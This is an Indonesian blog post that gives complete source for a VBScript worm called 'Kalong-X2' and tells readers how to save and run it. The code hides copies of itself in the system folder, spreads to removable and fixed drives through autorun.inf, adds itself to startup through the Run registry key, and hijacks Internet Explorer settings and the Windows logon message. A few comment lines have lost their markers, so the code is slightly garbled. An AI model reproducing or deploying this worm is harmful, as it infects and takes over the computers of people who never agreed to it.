SEBELUM MEMBUAT VIRUS INI, SAYA BERHARAP ANDA MENGGUNAKANNYA UNTUK KEBAIKAN
1. Script coding pertama
[autorun]
shellexecute=wscript.exe k4l0n6.sys.vbs
simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda
petik)
2. Script coding kedua
'Kalong-X2
'Varian dari Kalong.VBS
on error resume next
'Dim kata-kata berikut
dim
rekur,syspath,windowpath,desades,longka,mf,isi,tf,kalong,nt,check,sd
Siapkan isi autorun
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0n6.sys.vbs"
set longka = createobject("Scripting.FileSystemObject")
set mf = longka.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Buat file induk
Set windowpath = longka.getspecialfolder(0)
Set syspath = longka.getspecialfolder(1)
set tf = longka.getfile(syspath & "\recycle.vbs")
tf.attributes = 32
set tf = longka.createtextfile(syspath & "\recycle.vbs",2,true)
tf.write rekur
tf.close
set tf = longka.getfile(syspath & "\recycle.vbs")
tf.attributes = 39
Sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set tf=longka.getfile(desades.path &"\k4l0n6.sys.vbs")
tf.attributes =32
set tf=longka.createtextfile(desades.path &"\k4l0n6.sys.vbs",2,true)
tf.write rekur
tf.close
set tf=longka.getfile(desades.path &"\k4l0n6.sys.vbs")
tf.attributes = 39
set tf =longka.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=longka.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = longka.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next
Manipulasi Registry
set kalong = createobject("WScript.Shell")
Ubah IE Title
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\Window Title",":: X2 ATTACK ::"
Ubah tulisan pertama pada text box menu RUN
kalong.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explo
rer\RunMRU\a", "KALONG-X2/1"
kalong.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunM\MRUList","a"
Buat pesan saat Windows Startup
kalong.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Win
logon\LegalNoticeCaption", "KALONG-X2"
kalong.RegWrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Komputer Anda Diambil Alih"
Aktifkan saat Windows Startup
kalong.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia",syspath & "\recycle.vbs"
Ubah Default Start Page Internet Explorer
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\Start Page", "http://www.vaksin.com"
Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
Simpan coding tersebut dengan nama dan ekstensi file “k4l0n6.sys.vbs” (tanpa
tanda petik)
**WARNING**
karna secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi seluruh komputer
Buka semua
Close all
0 komentar:
Posting Komentar